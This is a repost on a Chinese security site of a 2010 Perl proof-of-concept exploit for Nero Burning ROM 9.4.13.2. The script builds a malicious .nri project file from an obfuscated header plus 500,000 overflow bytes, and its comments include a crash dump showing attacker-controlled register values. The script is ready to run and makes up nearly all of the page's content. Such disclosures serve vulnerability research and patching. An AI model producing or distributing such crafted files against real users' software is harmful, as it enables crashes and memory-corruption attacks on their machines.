Nero Burning ROM v9.4.13.2 (iso compilation) Local Buffer Invasion PoC

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Nero Burning ROM v9.4.13.2 (iso compilation) Local Buffer Invasion PoC

来源：iquidworm gmail com 作者：LiquidWorm 发布时间：2010-02-23

#!/usr/bin/perl
#
#
# Title: Nero Burning ROM 9 (iso compilation) Local Buffer Invasion Proof Of Concept
#
#
# Product web page: http://www.nero.com
# Version tested: 9.4.13.2
# OS platform used: Microsoft Windows XP Professional SP3 (English)
#
# Registers pick'a'chu:
# ------------------------------------------------------------------------
#
# (adc.b30): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0012ecf0 edx=00000000 esi=04c8acc8 edi=00e29890
# eip=0057f53c esp=0012ec38 ebp=0012ed28 iopl=0         nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000             efl=00010206
# Nero+0x17f53c:
# 0057f53c 394204          cmp     dword ptr [edx+4],eax ds:0023:00000004=????????
#
# ------------------------------------------------------------------------
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.org
#
# 30.09.2009
#
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4927.php
#

              ##          ##
             # #        # #
            #    #      #    #
           #O     #    #     O#
          #[*]     # #     [*]#
                   ####
              $id="\xFF\xFE".
     "\xFF\x0E\x4E\x00".
          "\x65\x00\x72\x00\x6F".
        "\x00\x49\x00\x53\x00\x4F".
      #####===###_O----O_###===#####
      "\x00\x30\x00\x2E\x00\x30\x00".
      "\x33\x00\x2E\x00\x30\x00\x31".
        "\x00\x0B\x00\x00\x00\x01".
         "\x00\x00\x00\x00\x00".
                "\x10\x4E".
                  "\x45".
                  "\x52".
                  "\x4F".
        "\x20\x42\x55\x52\x4E\x49".
     "\x4E".    "\x47\x20".   "\x52".
   "\x4F".    "\x4D\x00\x00".    "\x00".
   "\x9C".   "\x20\xBC\x4A\x9C". "\x20".
    "\xBC".    "\x4A\xFF\xFF". "\xFF".
    "\xFF".    "\xFF\xFF\xFF". "\xFF".
   "\x00".       "\x00\x00".     "\x00".
   "\x9F".    "\x20".   "\xBC". "\x4A".
   "\x01". "\x00".       "\x00"."\x00".
    "\x00". "\x00".       "\x00"."\x00".
    "\x01"."\x00\x00". "\x00\x01"."\x00".
    "\x00".                       "\x00".
    "\x01".                       "\x00".
     "\x00".                     "\x00".
     "\x00".                     "\x00".
       "\x00".                 "\x00";
###############################################
###############################################

       $fl="Neeero.nri";$op="\x41" x 500000;
       open nri, ">./$fl" || die "\nCan't open $fl: $!";
       print nri $id.$op;
       print "\n ~ Invasion started...\n";
       sleep 1;close nri;
       print "\n ~ File $fl invaded host.\n";

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告